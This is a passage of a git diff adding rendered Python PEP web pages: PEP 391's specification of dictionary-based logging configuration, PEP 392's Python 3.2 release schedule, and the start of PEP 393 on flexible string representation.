By providing a way to configure logging by passing the configuration +in a dictionary, logging will be easier to configure not only for +users of JSON and/or YAML, but also for users of custom configuration +methods, by providing a common format in which to describe the desired +configuration.

+

Another drawback of the current ConfigParser-based configuration +system is that it does not support incremental configuration: a new +configuration completely replaces the existing configuration. +Although full flexibility for incremental configuration is difficult +to provide in a multi-threaded environment, the new configuration +mechanism will allow the provision of limited support for incremental +configuration.

+
+
+

Specification

+

The specification consists of two parts: the API and the format of the +dictionary used to convey configuration information (i.e. the schema +to which it must conform).

+
+

Naming

+

Historically, the logging package has not been PEP 8 conformant. +At some future time, this will be corrected by changing method and +function names in the package in order to conform with PEP 8. +However, in the interests of uniformity, the proposed additions to the +API use a naming scheme which is consistent with the present scheme +used by logging.

+
+
+

API

+

The logging.config module will have the following addition:

+
    +
  • A function, called dictConfig(), which takes a single argument +- the dictionary holding the configuration. Exceptions will be +raised if there are errors while processing the dictionary.
  • +
+

It will be possible to customize this API - see the section on API +Customization. Incremental configuration is covered in its own +section.

+
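
A minimal usage sketch (the key names follow the schema described in the rest of this PEP; the required version key is part of that schema):

+
import logging
+import logging.config
+
+config = {
+    'version': 1,
+    'formatters': {
+        'brief': {'format': '%(message)s'},
+    },
+    'handlers': {
+        'console': {
+            'class': 'logging.StreamHandler',
+            'formatter': 'brief',
+        },
+    },
+    'root': {
+        'level': 'INFO',
+        'handlers': ['console'],
+    },
+}
+
+logging.config.dictConfig(config)
+logging.getLogger('foo.bar.baz').info('configured from a dictionary')
+
+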
+
+

Dictionary Schema - Overview

+

Before describing the schema in detail, it is worth saying a few words +about object connections, support for user-defined objects and access +to external and internal objects.

+
+

Object connections

+

The schema is intended to describe a set of logging objects - loggers, +handlers, formatters, filters - which are connected to each other in +an object graph. Thus, the schema needs to represent connections +between the objects. For example, say that, once configured, a +particular logger has attached to it a particular handler. For the +purposes of this discussion, we can say that the logger represents the +source, and the handler the destination, of a connection between the +two. Of course in the configured objects this is represented by the +logger holding a reference to the handler. In the configuration dict, +this is done by giving each destination object an id which identifies +it unambiguously, and then using the id in the source object’s +configuration to indicate that a connection exists between the source +and the destination object with that id.

+

So, for example, consider the following YAML snippet:

+
formatters:
+  brief:
+    # configuration for formatter with id 'brief' goes here
+  precise:
+    # configuration for formatter with id 'precise' goes here
+handlers:
+  h1: #This is an id
+   # configuration of handler with id 'h1' goes here
+   formatter: brief
+  h2: #This is another id
+   # configuration of handler with id 'h2' goes here
+   formatter: precise
+loggers:
+  foo.bar.baz:
+    # other configuration for logger 'foo.bar.baz'
+    handlers: [h1, h2]
+
+
+

(Note: YAML will be used in this document as it is a little more +readable than the equivalent Python source form for the dictionary.)

+

The ids for loggers are the logger names which would be used +programmatically to obtain a reference to those loggers, e.g. +foo.bar.baz. The ids for Formatters and Filters can be any string +value (such as brief, precise above) and they are transient, +in that they are only meaningful for processing the configuration +dictionary and used to determine connections between objects, and are +not persisted anywhere when the configuration call is complete.

+

Handler ids are treated specially, see the section on +Handler Ids, below.

+

The above snippet indicates that logger named foo.bar.baz should +have two handlers attached to it, which are described by the handler +ids h1 and h2. The formatter for h1 is that described by id +brief, and the formatter for h2 is that described by id +precise.

+
+
+

User-defined objects

+

The schema should support user-defined objects for handlers, filters +and formatters. (Loggers do not need to have different types for +different instances, so there is no support - in the configuration - +for user-defined logger classes.)

+

Objects to be configured will typically be described by dictionaries +which detail their configuration. In some places, the logging system +will be able to infer from the context how an object is to be +instantiated, but when a user-defined object is to be instantiated, +the system will not know how to do this. In order to provide complete +flexibility for user-defined object instantiation, the user will need +to provide a ‘factory’ - a callable which is called with a +configuration dictionary and which returns the instantiated object. +This will be signalled by an absolute import path to the factory being +made available under the special key '()'. Here’s a concrete +example:

+
formatters:
+  brief:
+    format: '%(message)s'
+  default:
+    format: '%(asctime)s %(levelname)-8s %(name)-15s %(message)s'
+    datefmt: '%Y-%m-%d %H:%M:%S'
+  custom:
+      (): my.package.customFormatterFactory
+      bar: baz
+      spam: 99.9
+      answer: 42
+
+
+

The above YAML snippet defines three formatters. The first, with id +brief, is a standard logging.Formatter instance with the +specified format string. The second, with id default, has a +longer format and also defines the time format explicitly, and will +result in a logging.Formatter initialized with those two format +strings. Shown in Python source form, the brief and default +formatters have configuration sub-dictionaries:

+
{
+  'format' : '%(message)s'
+}
+
+
+

and:

+
{
+  'format' : '%(asctime)s %(levelname)-8s %(name)-15s %(message)s',
+  'datefmt' : '%Y-%m-%d %H:%M:%S'
+}
+
+
+

respectively, and as these dictionaries do not contain the special key +'()', the instantiation is inferred from the context: as a result, +standard logging.Formatter instances are created. The +configuration sub-dictionary for the third formatter, with id +custom, is:

+
{
+  '()' : 'my.package.customFormatterFactory',
+  'bar' : 'baz',
+  'spam' : 99.9,
+  'answer' : 42
+}
+
+
+

and this contains the special key '()', which means that +user-defined instantiation is wanted. In this case, the specified +factory callable will be used. If it is an actual callable it will be +used directly - otherwise, if you specify a string (as in the example) +the actual callable will be located using normal import mechanisms. +The callable will be called with the remaining items in the +configuration sub-dictionary as keyword arguments. In the above +example, the formatter with id custom will be assumed to be +returned by the call:

+
my.package.customFormatterFactory(bar='baz', spam=99.9, answer=42)
+
+
+

The key '()' has been used as the special key because it is not a +valid keyword parameter name, and so will not clash with the names of +the keyword arguments used in the call. The '()' also serves as a +mnemonic that the corresponding value is a callable.

+
+
+

Access to external objects

+

There are times where a configuration will need to refer to objects +external to the configuration, for example sys.stderr. If the +configuration dict is constructed using Python code then this is +straightforward, but a problem arises when the configuration is +provided via a text file (e.g. JSON, YAML). In a text file, there is +no standard way to distinguish sys.stderr from the literal string +'sys.stderr'. To facilitate this distinction, the configuration +system will look for certain special prefixes in string values and +treat them specially. For example, if the literal string +'ext://sys.stderr' is provided as a value in the configuration, +then the ext:// will be stripped off and the remainder of the +value processed using normal import mechanisms.

+

The handling of such prefixes will be done in a way analogous to +protocol handling: there will be a generic mechanism to look for +prefixes which match the regular expression +^(?P<prefix>[a-z]+)://(?P<suffix>.*)$ whereby, if the prefix +is recognised, the suffix is processed in a prefix-dependent +manner and the result of the processing replaces the string value. If +the prefix is not recognised, then the string value will be left +as-is.
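A rough sketch of this mechanism, with illustrative names that are not part of the proposed API, might look like:

import importlib
import re

PREFIX_RE = re.compile(r'^(?P<prefix>[a-z]+)://(?P<suffix>.*)$')

def ext_convert(suffix):
    # Resolve a dotted path such as 'sys.stderr' using normal import
    # mechanisms.
    module_name, _, attr = suffix.rpartition('.')
    return getattr(importlib.import_module(module_name), attr)

converters = {'ext': ext_convert}

def convert(value):
    # Replace a recognised 'prefix://suffix' string with the result of the
    # prefix-specific processing; anything else is left as-is.
    match = PREFIX_RE.match(value) if isinstance(value, str) else None
    if match and match.group('prefix') in converters:
        return converters[match.group('prefix')](match.group('suffix'))
    return value

With this sketch, convert('ext://sys.stderr') returns the sys.stderr object, while convert('sys.stderr') returns the literal string unchanged.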

+

The implementation will provide for a set of standard prefixes such as +ext:// but it will be possible to disable the mechanism completely +or provide additional or different prefixes for special handling.

+
+
+

Access to internal objects

+

As well as external objects, there is sometimes also a need to refer +to objects in the configuration. This will be done implicitly by the +configuration system for things that it knows about. For example, the +string value 'DEBUG' for a level in a logger or handler will +automatically be converted to the value logging.DEBUG, and the +handlers, filters and formatter entries will take an +object id and resolve to the appropriate destination object.

+

However, a more generic mechanism needs to be provided for the case +of user-defined objects which are not known to logging. For example, +consider logging.handlers.MemoryHandler, which takes +a target which is another handler to delegate to. Since the system +already knows about this class, in the configuration, the given +target just needs to be the object id of the relevant target +handler, and the system will resolve the handler from the id. If, +however, a user defines a my.package.MyHandler which has an +alternate handler, the configuration system would not know that +the alternate referred to a handler. To cater for this, a +generic resolution system will be provided which allows the user to +specify:

+
handlers:
+  file:
+    # configuration of file handler goes here
+
+  custom:
+    (): my.package.MyHandler
+    alternate: cfg://handlers.file
+
+
+

The literal string 'cfg://handlers.file' will be resolved in an +analogous way to the strings with the ext:// prefix, but looking +in the configuration itself rather than the import namespace. The +mechanism will allow access by dot or by index, in a similar way to +that provided by str.format. Thus, given the following snippet:

+
handlers:
+  email:
+    class: logging.handlers.SMTPHandler
+    mailhost: localhost
+    fromaddr: my_app@domain.tld
+    toaddrs:
+      - support_team@domain.tld
+      - dev_team@domain.tld
+    subject: Houston, we have a problem.
+
+
+

in the configuration, the string 'cfg://handlers' would resolve to +the dict with key handlers, the string 'cfg://handlers.email' +would resolve to the dict with key email in the handlers dict, +and so on. The string 'cfg://handlers.email.toaddrs[1]' would +resolve to 'dev_team@domain.tld' and the string +'cfg://handlers.email.toaddrs[0]' would resolve to the value +'support_team@domain.tld'. The subject value could be accessed +using either 'cfg://handlers.email.subject' or, equivalently, +'cfg://handlers.email[subject]'. The latter form only needs to be +used if the key contains spaces or non-alphanumeric characters. If an +index value consists only of decimal digits, access will be attempted +using the corresponding integer value, falling back to the string +value if needed.

+

Given a string cfg://handlers.myhandler.mykey.123, this will +resolve to config_dict['handlers']['myhandler']['mykey']['123']. +If the string is specified as cfg://handlers.myhandler.mykey[123], +the system will attempt to retrieve the value from +config_dict['handlers']['myhandler']['mykey'][123], and fall back +to config_dict['handlers']['myhandler']['mykey']['123'] if that +fails.
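A sketch of how such path traversal could be implemented (illustrative only, not the reference implementation's code):

import re

TOKEN = re.compile(r'\.?(\w+)|\[([^\]]+)\]')

def cfg_resolve(config, path):
    # Resolve the part after 'cfg://', e.g. 'handlers.email.toaddrs[1]',
    # against the configuration dict. All-digit indices are tried as
    # integers first, falling back to the string key.
    current = config
    for dotted, indexed in TOKEN.findall(path):
        key = dotted or indexed
        if key.isdigit():
            try:
                current = current[int(key)]
                continue
            except (KeyError, IndexError, TypeError):
                pass
        current = current[key]
    return current

Given the email handler snippet above, cfg_resolve(config, 'handlers.email.toaddrs[0]') would return 'support_team@domain.tld'.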

+
+
+

Handler Ids

+

Some specific logging configurations require the use of handler levels +to achieve the desired effect. However, unlike loggers which can +always be identified by their names, handlers have no persistent +handles whereby levels can be changed via an incremental configuration +call.

+

Therefore, this PEP proposes to add an optional name property to +handlers. If used, this will add an entry in a dictionary which maps +the name to the handler. (The entry will be removed when the handler +is closed.) When an incremental configuration call is made, handlers +will be looked up in this dictionary to set the handler level +according to the value in the configuration. See the section on +incremental configuration for more details.

+

In theory, such a “persistent name” facility could also be provided +for Filters and Formatters. However, there is not a strong case to be +made for being able to configure these incrementally. On the basis +that practicality beats purity, only Handlers will be given this new +name property. The id of a handler in the configuration will +become its name.

+

The handler name lookup dictionary is for configuration use only and +will not become part of the public API for the package.
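The mapping idea can be sketched as follows; the names here are purely illustrative, since the PEP deliberately keeps this dictionary out of the public API:

_handlers = {}  # name -> handler, for configuration use only

def set_handler_name(handler, name):
    # Re-point the mapping when a handler is (re)named; the entry would
    # also be removed when the handler is closed.
    old = getattr(handler, '_name', None)
    if old and old in _handlers:
        del _handlers[old]
    if name:
        _handlers[name] = handler
    handler._name = name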

+
+
+
+

Dictionary Schema - Detail

+

The dictionary passed to dictConfig() must contain the following +keys:

+
    +
  • version - to be set to an integer value representing the schema +version. The only valid value at present is 1, but having this key +allows the schema to evolve while still preserving backwards +compatibility.
  • +
+

All other keys are optional, but if present they will be interpreted +as described below. In all cases below where a ‘configuring dict’ is +mentioned, it will be checked for the special '()' key to see if a +custom instantiation is required. If so, the mechanism described +above is used to instantiate; otherwise, the context is used to +determine how to instantiate.

+
    +
  • formatters - the corresponding value will be a dict in which each +key is a formatter id and each value is a dict describing how to +configure the corresponding Formatter instance.

    The configuring dict is searched for keys format and datefmt +(with defaults of None) and these are used to construct a +logging.Formatter instance.

    +
  • +
  • filters - the corresponding value will be a dict in which each key +is a filter id and each value is a dict describing how to configure +the corresponding Filter instance.

    The configuring dict is searched for key name (defaulting to the +empty string) and this is used to construct a logging.Filter +instance.

    +
  • +
  • handlers - the corresponding value will be a dict in which each +key is a handler id and each value is a dict describing how to +configure the corresponding Handler instance.

    The configuring dict is searched for the following keys:

    +
      +
    • class (mandatory). This is the fully qualified name of the +handler class.
    • +
    • level (optional). The level of the handler.
    • +
    • formatter (optional). The id of the formatter for this +handler.
    • +
    • filters (optional). A list of ids of the filters for this +handler.
    • +
    +

    All other keys are passed through as keyword arguments to the +handler’s constructor. For example, given the snippet:

    +
    handlers:
    +  console:
    +    class : logging.StreamHandler
    +    formatter: brief
    +    level   : INFO
    +    filters: [allow_foo]
    +    stream  : ext://sys.stdout
    +  file:
    +    class : logging.handlers.RotatingFileHandler
    +    formatter: precise
    +    filename: logconfig.log
    +    maxBytes: 1024
    +    backupCount: 3
    +
    +
    +

    the handler with id console is instantiated as a +logging.StreamHandler, using sys.stdout as the underlying +stream. The handler with id file is instantiated as a +logging.handlers.RotatingFileHandler with the keyword arguments +filename='logconfig.log', maxBytes=1024, backupCount=3.

    +
  • +
  • loggers - the corresponding value will be a dict in which each key +is a logger name and each value is a dict describing how to +configure the corresponding Logger instance.

    The configuring dict is searched for the following keys:

    +
      +
    • level (optional). The level of the logger.
    • +
    • propagate (optional). The propagation setting of the logger.
    • +
    • filters (optional). A list of ids of the filters for this +logger.
    • +
    • handlers (optional). A list of ids of the handlers for this +logger.
    • +
    +

    The specified loggers will be configured according to the level, +propagation, filters and handlers specified.

    +
  • +
  • root - this will be the configuration for the root logger. +Processing of the configuration will be as for any logger, except +that the propagate setting will not be applicable.
  • +
  • incremental - whether the configuration is to be interpreted as +incremental to the existing configuration. This value defaults to +False, which means that the specified configuration replaces the +existing configuration with the same semantics as used by the +existing fileConfig() API.

    If the specified value is True, the configuration is processed +as described in the section on Incremental Configuration, below.

    +
  • +
  • disable_existing_loggers - whether any existing loggers are to be +disabled. This setting mirrors the parameter of the same name in +fileConfig(). If absent, this parameter defaults to True. +This value is ignored if incremental is True.
  • +
+
+
+

A Working Example

+

The following is an actual working configuration in YAML format +(except that the email addresses are bogus):

+
formatters:
+  brief:
+    format: '%(levelname)-8s: %(name)-15s: %(message)s'
+  precise:
+    format: '%(asctime)s %(name)-15s %(levelname)-8s %(message)s'
+filters:
+  allow_foo:
+    name: foo
+handlers:
+  console:
+    class : logging.StreamHandler
+    formatter: brief
+    level   : INFO
+    stream  : ext://sys.stdout
+    filters: [allow_foo]
+  file:
+    class : logging.handlers.RotatingFileHandler
+    formatter: precise
+    filename: logconfig.log
+    maxBytes: 1024
+    backupCount: 3
+  debugfile:
+    class : logging.FileHandler
+    formatter: precise
+    filename: logconfig-detail.log
+    mode: a
+  email:
+    class: logging.handlers.SMTPHandler
+    mailhost: localhost
+    fromaddr: my_app@domain.tld
+    toaddrs:
+      - support_team@domain.tld
+      - dev_team@domain.tld
+    subject: Houston, we have a problem.
+loggers:
+  foo:
+    level : ERROR
+    handlers: [debugfile]
+  spam:
+    level : CRITICAL
+    handlers: [debugfile]
+    propagate: no
+  bar.baz:
+    level: WARNING
+root:
+  level     : DEBUG
+  handlers  : [console, file]
+
+
+
+
+
+

Incremental Configuration

+

It is difficult to provide complete flexibility for incremental +configuration. For example, because objects such as filters +and formatters are anonymous, once a configuration is set up, it is +not possible to refer to such anonymous objects when augmenting a +configuration.

+

Furthermore, there is not a compelling case for arbitrarily altering +the object graph of loggers, handlers, filters, formatters at +run-time, once a configuration is set up; the verbosity of loggers and +handlers can be controlled just by setting levels (and, in the case of +loggers, propagation flags). Changing the object graph arbitrarily in +a safe way is problematic in a multi-threaded environment; while not +impossible, the benefits are not worth the complexity it adds to the +implementation.

+

Thus, when the incremental key of a configuration dict is present +and is True, the system will ignore any formatters and +filters entries completely, and process only the level +settings in the handlers entries, and the level and +propagate settings in the loggers and root entries.

+

It’s certainly possible to provide incremental configuration by other +means, for example making dictConfig() take an incremental +keyword argument which defaults to False. The reason for +suggesting that a value in the configuration dict be used is that it +allows for configurations to be sent over the wire as pickled dicts +to a socket listener. Thus, the logging verbosity of a long-running +application can be altered over time with no need to stop and +restart the application.
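For example, assuming a listener that accepts length-prefixed pickled dicts on the default logging configuration port (9030), a client could push an incremental change like this sketch (the framing and port are assumptions about the listener, not part of this PEP's specification):

import pickle
import socket
import struct

config = {
    'version': 1,
    'incremental': True,
    'handlers': {'console': {'level': 'WARNING'}},
    'loggers': {'foo': {'level': 'DEBUG'}},
}

payload = pickle.dumps(config)
sock = socket.create_connection(('localhost', 9030))
try:
    # Each message is prefixed with its length as a big-endian 32-bit int.
    sock.sendall(struct.pack('>L', len(payload)) + payload)
finally:
    sock.close()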

+

Note: Feedback on incremental configuration needs, based on your +practical experience, will be particularly welcome.

+
+
+

API Customization

+

The bare-bones dictConfig() API will not be sufficient for all +use cases. Provision for customization of the API will be made by +providing the following:

+
    +
  • A class, called DictConfigurator, whose constructor is passed +the dictionary used for configuration, and which has a +configure() method.
  • +
  • A callable, called dictConfigClass, which will (by default) be +set to DictConfigurator. This is provided so that if desired, +DictConfigurator can be replaced with a suitable user-defined +implementation.
  • +
+

The dictConfig() function will call dictConfigClass passing +the specified dictionary, and then call the configure() method on +the returned object to actually put the configuration into effect:

+
def dictConfig(config):
+    dictConfigClass(config).configure()
+
+
+

This should cater to all customization needs. For example, a subclass +of DictConfigurator could call DictConfigurator.__init__() in +its own __init__(), then set up custom prefixes which would be +usable in the subsequent configure() call. The dictConfigClass +would be bound to the subclass, and then dictConfig() could be +called exactly as in the default, uncustomized state.
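The pattern might look like the following sketch. Note that value_converters is a detail of the eventual reference implementation (a mapping of prefix to handler method name), not part of the API specified here:

import logging.config

class MyConfigurator(logging.config.DictConfigurator):
    # Extend the prefix table before configure() runs.
    value_converters = dict(logging.config.DictConfigurator.value_converters)
    value_converters['env'] = 'env_convert'

    def env_convert(self, suffix):
        # Resolve e.g. 'env://HOME' from the process environment.
        import os
        return os.environ[suffix]

logging.config.dictConfigClass = MyConfigurator
# logging.config.dictConfig() now uses MyConfigurator transparently.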

+
+
+

Change to Socket Listener Implementation

+

The existing socket listener implementation will be modified as +follows: when a configuration message is received, an attempt will be +made to deserialize to a dictionary using the json module. If this +step fails, the message will be assumed to be in the fileConfig format +and processed as before. If deserialization is successful, then +dictConfig() will be called to process the resulting dictionary.
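The dispatch logic amounts to something like this sketch (handle_config_message is a hypothetical name for the listener's per-message handler):

import io
import json
import logging.config

def handle_config_message(text):
    # Try JSON first; if deserialization fails, assume the message is in
    # the existing fileConfig (ConfigParser) format and process as before.
    try:
        d = json.loads(text)
    except ValueError:
        logging.config.fileConfig(io.StringIO(text))
    else:
        logging.config.dictConfig(d)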

+
+
+

Configuration Errors

+

If an error is encountered during configuration, the system will raise +a ValueError, TypeError, AttributeError or ImportError +with a suitably descriptive message. The following is a (possibly +incomplete) list of conditions which will raise an error:

+
    +
  • A level which is not a string or which is a string not +corresponding to an actual logging level
  • +
  • A propagate value which is not a boolean
  • +
  • An id which does not have a corresponding destination
  • +
  • A non-existent handler id found during an incremental call
  • +
  • An invalid logger name
  • +
  • Inability to resolve to an internal or external object
  • +
+
+
+

Discussion in the community

+

The PEP has been announced on python-dev and python-list. While there +hasn’t been a huge amount of discussion, this is perhaps to be +expected for a niche topic.

+

Discussion threads on python-dev:

+

https://mail.python.org/pipermail/python-dev/2009-October/092695.html +https://mail.python.org/pipermail/python-dev/2009-October/092782.html +https://mail.python.org/pipermail/python-dev/2009-October/093062.html

+

And on python-list:

+

https://mail.python.org/pipermail/python-list/2009-October/1223658.html +https://mail.python.org/pipermail/python-list/2009-October/1224228.html

+

There have been some comments in favour of the proposal, no +objections to the proposal as a whole, and some questions and +objections about specific details. These are believed by the author +to have been addressed by making changes to the PEP.

+
+
+

Reference implementation

+

A reference implementation of the changes is available as a module +dictconfig.py with accompanying unit tests in test_dictconfig.py, at:

+

http://bitbucket.org/vinay.sajip/dictconfig

+

This incorporates all features other than the socket listener change.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0391.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0392/index.html b/pep-0392/index.html new file mode 100644 index 00000000000..a5c4bdb9718 --- /dev/null +++ b/pep-0392/index.html @@ -0,0 +1,254 @@ + PEP 392 – Python 3.2 Release Schedule | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 392 – Python 3.2 Release Schedule

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
30-Dec-2009
+
Python-Version:
+
3.2
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for the +Python 3.2 series. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.2 Release Manager: Georg Brandl
  • +
  • Windows installers: Martin v. Loewis
  • +
  • Mac installers: Ronald Oussoren
  • +
  • Documentation: Georg Brandl
  • +
+
+
+

3.2 Lifespan

+

3.2 will receive bugfix updates approximately every 4-6 months for +approximately 18 months. After the release of 3.3.0 final (see PEP +398), a final 3.2 bugfix update will be released. After that, +security updates (source only) will be released until 5 years after +the release of 3.2 final, which was planned for February 2016.

+

As of 2016-02-20, Python 3.2.x reached end-of-life status. The final +source release was 3.2.6 in October 2014.

+
+
+

Release Schedule

+
+

3.2 schedule

+
    +
  • 3.2 alpha 1: August 1, 2010
  • +
  • 3.2 alpha 2: September 6, 2010
  • +
  • 3.2 alpha 3: October 12, 2010
  • +
  • 3.2 alpha 4: November 16, 2010
  • +
  • 3.2 beta 1: December 6, 2010
  • +
+

(No new features beyond this point.)

+
    +
  • 3.2 beta 2: December 20, 2010
  • +
  • 3.2 candidate 1: January 16, 2011
  • +
  • 3.2 candidate 2: January 31, 2011
  • +
  • 3.2 candidate 3: February 14, 2011
  • +
  • 3.2 final: February 20, 2011
  • +
+
+
+

3.2.1 schedule

+
    +
  • 3.2.1 beta 1: May 8, 2011
  • +
  • 3.2.1 candidate 1: May 17, 2011
  • +
  • 3.2.1 candidate 2: July 3, 2011
  • +
  • 3.2.1 final: July 11, 2011
  • +
+
+
+

3.2.2 schedule

+
    +
  • 3.2.2 candidate 1: August 14, 2011
  • +
  • 3.2.2 final: September 4, 2011
  • +
+
+
+

3.2.3 schedule

+
    +
  • 3.2.3 candidate 1: February 25, 2012
  • +
  • 3.2.3 candidate 2: March 18, 2012
  • +
  • 3.2.3 final: April 11, 2012
  • +
+
+
+

3.2.4 schedule

+
    +
  • 3.2.4 candidate 1: March 23, 2013
  • +
  • 3.2.4 final: April 6, 2013
  • +
+
+
+

3.2.5 schedule (regression fix release)

+
    +
  • 3.2.5 final: May 13, 2013
  • +
+

– Only security releases after 3.2.5 –

+
+
+

3.2.6 schedule

+
    +
  • 3.2.6 candidate 1 (source-only release): October 4, 2014
  • +
  • 3.2.6 final (source-only release): October 11, 2014
  • +
+
+
+
+

Features for 3.2

+

Note that PEP 3003 is in effect: no changes to language +syntax and no additions to the builtins may be made.

+

No large-scale changes have been recorded yet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0392.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0393/index.html b/pep-0393/index.html new file mode 100644 index 00000000000..2d5ca7f10d7 --- /dev/null +++ b/pep-0393/index.html @@ -0,0 +1,663 @@ + PEP 393 – Flexible String Representation | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 393 – Flexible String Representation

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Jan-2010
+
Python-Version:
+
3.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

The Unicode string type is changed to support multiple internal +representations, depending on the character with the largest Unicode +ordinal (1, 2, or 4 bytes). This will allow a space-efficient +representation in common cases, but give access to full UCS-4 on all +systems. For compatibility with existing APIs, several representations +may exist in parallel; over time, this compatibility should be phased +out. The distinction between narrow and wide Unicode builds is +dropped. An implementation of this PEP is available at [1].

+
+
+

Rationale

+

There are two classes of complaints about the current implementation +of the unicode type: on systems only supporting UTF-16, users complain +that non-BMP characters are not properly supported. On systems using +UCS-4 internally (and also sometimes on systems using UCS-2), there is +a complaint that Unicode strings take up too much memory - especially +compared to Python 2.x, where the same code would often use ASCII +strings (i.e. ASCII-encoded byte strings). With the proposed approach, +ASCII-only Unicode strings will again use only one byte per character, +while still allowing efficient indexing of strings containing non-BMP +characters (as strings containing them will use 4 bytes per +character).

+

One problem with the approach is support for existing applications +(e.g. extension modules). For compatibility, redundant representations +may be computed. Applications are encouraged to phase out reliance on +a specific internal representation if possible. As interaction with +other libraries will often require some sort of internal +representation, the specification chooses UTF-8 as the recommended way +of exposing strings to C code.

+

For many strings (e.g. ASCII), multiple representations may actually +share memory (e.g. the shortest form may be shared with the UTF-8 form +if all characters are ASCII). With such sharing, the overhead of +compatibility representations is reduced. If representations do share +data, it is also possible to omit structure fields, reducing the base +size of string objects.

+
+
+

Specification

+

Unicode structures are now defined as a hierarchy of structures, +namely:

+
typedef struct {
+  PyObject_HEAD
+  Py_ssize_t length;
+  Py_hash_t hash;
+  struct {
+      unsigned int interned:2;
+      unsigned int kind:2;
+      unsigned int compact:1;
+      unsigned int ascii:1;
+      unsigned int ready:1;
+  } state;
+  wchar_t *wstr;
+} PyASCIIObject;
+
+typedef struct {
+  PyASCIIObject _base;
+  Py_ssize_t utf8_length;
+  char *utf8;
+  Py_ssize_t wstr_length;
+} PyCompactUnicodeObject;
+
+typedef struct {
+  PyCompactUnicodeObject _base;
+  union {
+      void *any;
+      Py_UCS1 *latin1;
+      Py_UCS2 *ucs2;
+      Py_UCS4 *ucs4;
+  } data;
+} PyUnicodeObject;
+
+
+

Objects for which both size and maximum character are known at +creation time are called “compact” unicode objects; character data +immediately follow the base structure. If the maximum character is +less than 128, they use the PyASCIIObject structure, and the UTF-8 +data, the UTF-8 length and the wstr length are the same as the length +of the ASCII data. For non-ASCII strings, the PyCompactUnicodeObject +structure is used. Resizing compact objects is not supported.

+

Objects for which the maximum character is not given at creation time +are called “legacy” objects, created through +PyUnicode_FromStringAndSize(NULL, length). They use the +PyUnicodeObject structure. Initially, their data is only in the wstr +pointer; when PyUnicode_READY is called, the data pointer (union) is +allocated. Resizing is possible as long as PyUnicode_READY has not been +called.

+

The fields have the following interpretations:

+
    +
  • length: number of code points in the string (result of sq_length)
  • +
  • interned: interned-state (SSTATE_*) as in 3.2
  • +
  • kind: form of string
      +
    • 00 => str is not initialized (data are in wstr)
    • +
    • 01 => 1 byte (Latin-1)
    • +
    • 10 => 2 byte (UCS-2)
    • +
    • 11 => 4 byte (UCS-4);
    • +
    +
  • +
  • compact: the object uses one of the compact representations +(implies ready)
  • +
  • ascii: the object uses the PyASCIIObject representation +(implies compact and ready)
  • +
  • ready: the canonical representation is ready to be accessed through +PyUnicode_DATA and PyUnicode_GET_LENGTH. This is set either if the +object is compact, or the data pointer and length have been +initialized.
  • +
  • wstr_length, wstr: representation in platform’s wchar_t +(null-terminated). If wchar_t is 16-bit, this form may use surrogate +pairs (in which case wstr_length differs from length). +wstr_length differs from length only if there are surrogate pairs +in the representation.
  • +
  • utf8_length, utf8: UTF-8 representation (null-terminated).
  • +
  • data: shortest-form representation of the unicode string. +The string is null-terminated (in its respective representation).
  • +
+

All three representations are optional, although the data form is +considered the canonical representation which can be absent only +while the string is being created. If the representation is absent, +the pointer is NULL, and the corresponding length field may contain +arbitrary data.

+

The Py_UNICODE type is still supported but deprecated. It is always +defined as a typedef for wchar_t, so the wstr representation can double +as Py_UNICODE representation.

+

The data and utf8 pointers point to the same memory if the string uses +only ASCII characters (using only Latin-1 is not sufficient). The data +and wstr pointers point to the same memory if the string happens to +fit exactly the wchar_t type of the platform (i.e. uses some +BMP-not-Latin-1 characters if sizeof(wchar_t) is 2, and uses some +non-BMP characters if sizeof(wchar_t) is 4).

+
+

String Creation

+

The recommended way to create a Unicode object is to use the function +PyUnicode_New:

+
PyObject* PyUnicode_New(Py_ssize_t size, Py_UCS4 maxchar);
+
+
+

Both parameters must denote the eventual size/range of the strings. +In particular, codecs using this API must compute both the number of +characters and the maximum character in advance. A string is +allocated according to the specified size and character range and is +null-terminated; the actual characters in it may be uninitialized.

+

PyUnicode_FromString and PyUnicode_FromStringAndSize remain supported +for processing UTF-8 input; the input is decoded, and the UTF-8 +representation is not yet set for the string.

+

PyUnicode_FromUnicode remains supported but is deprecated. If the +Py_UNICODE pointer is non-null, the data representation is set. If the +pointer is NULL, a properly-sized wstr representation is allocated, +which can be modified until PyUnicode_READY() is called (explicitly +or implicitly). Resizing a Unicode string remains possible until it +is finalized.

+

PyUnicode_READY() converts a string containing only a wstr +representation into the canonical representation. Unless wstr and data +can share the memory, the wstr representation is discarded after the +conversion. The macro returns 0 on success and -1 on failure, which +happens in particular if the memory allocation fails.

+
+
+

String Access

+

The canonical representation can be accessed using two macros +PyUnicode_KIND and PyUnicode_DATA. PyUnicode_KIND gives one of the +values PyUnicode_WCHAR_KIND (0), PyUnicode_1BYTE_KIND (1), +PyUnicode_2BYTE_KIND (2), or PyUnicode_4BYTE_KIND (3). PyUnicode_DATA +gives the void pointer to the data. Access to individual characters +should use PyUnicode_{READ|WRITE}[_CHAR]:

+
    +
  • PyUnicode_READ(kind, data, index)
  • +
  • PyUnicode_WRITE(kind, data, index, value)
  • +
  • PyUnicode_READ_CHAR(unicode, index)
  • +
+

All these macros assume that the string is in canonical form; +callers need to ensure this by calling PyUnicode_READY.

+

A new function PyUnicode_AsUTF8 is provided to access the UTF-8 +representation. It is thus identical to the existing +_PyUnicode_AsString, which is removed. The function will compute the +utf8 representation when first called. Since this representation will +consume memory until the string object is released, applications +should use the existing PyUnicode_AsUTF8String where possible +(which generates a new string object every time). APIs that implicitly +convert a string to a char* (such as the ParseTuple functions) will +use PyUnicode_AsUTF8 to compute a conversion.

+
+
+

